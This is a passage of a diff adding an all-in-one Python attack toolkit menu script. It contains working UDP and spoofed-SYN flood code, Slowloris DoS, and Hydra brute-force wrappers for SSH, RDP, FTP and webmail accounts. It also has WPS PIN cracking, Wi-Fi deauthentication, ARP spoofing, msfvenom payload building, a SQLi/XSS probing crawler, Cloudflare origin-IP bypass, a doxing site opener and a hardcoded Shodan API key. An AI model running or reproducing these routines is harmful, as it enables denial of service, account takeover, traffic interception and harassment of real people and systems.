a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + 